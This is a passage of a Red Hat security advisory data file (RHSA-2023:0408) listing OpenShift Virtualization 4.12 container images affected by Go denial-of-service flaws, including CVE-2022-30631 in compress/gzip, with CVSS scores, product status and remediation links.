"https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: io/fs: stack exhaustion in Glob", }, { cve: "CVE-2022-30631", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107342", }, ], notes: [ { category: "description", text: "A flaw was found in golang. Calling the Reader, Read method on an archive that contains a large number of concatenated 0-length compressed files can cause a panic issue due to stack exhaustion.", title: "Vulnerability description", }, { category: "summary", text: "golang: compress/gzip: stack exhaustion in Reader.Read", title: "Vulnerability summary", }, { category: "other", text: "To exploit CVE-2022-30631, an attacker supplies a specially crafted gzip archive to a Go application that uses a vulnerable version of the compress/gzip package without adequate input validation. This can lead to uncontrolled recursion, resulting in stack exhaustion and causing the application to panic, thereby affecting its availability.\n\nAs this is merely a DoS and there is no known way to control the instruction pointer, RH ProdSec has set the impact of this vulnerabilty to \"Moderate\".\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-1325: Improperly Controlled Sequential Memory Allocation vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nAccess to the platform is granted only after successful hard token-based multi-factor authentication (MFA) and is governed by least privilege to ensure only authorized users and roles can execute or modify code. Static code analysis and peer reviews enforce strong input validation and error handling, preventing improperly validated inputs from causing system instability, data exposure, or privilege escalation. In the event of successful exploitation, process isolation limits the impact of excessive sequential memory allocation by restricting memory use per process, preventing any single process from exhausting system resources. Finally, the platform uses memory protection mechanisms such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) to reduce the risk of memory allocation-based attacks.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-30631", }, { category: "external", summary: "RHBZ#2107342", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-30631", url: "https://www.cve.org/CVERecord?id=CVE-2022-30631", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-30631", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-30631", }, { category: "external", summary: "https://go.dev/issue/53168", url: "https://go.dev/issue/53168", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", 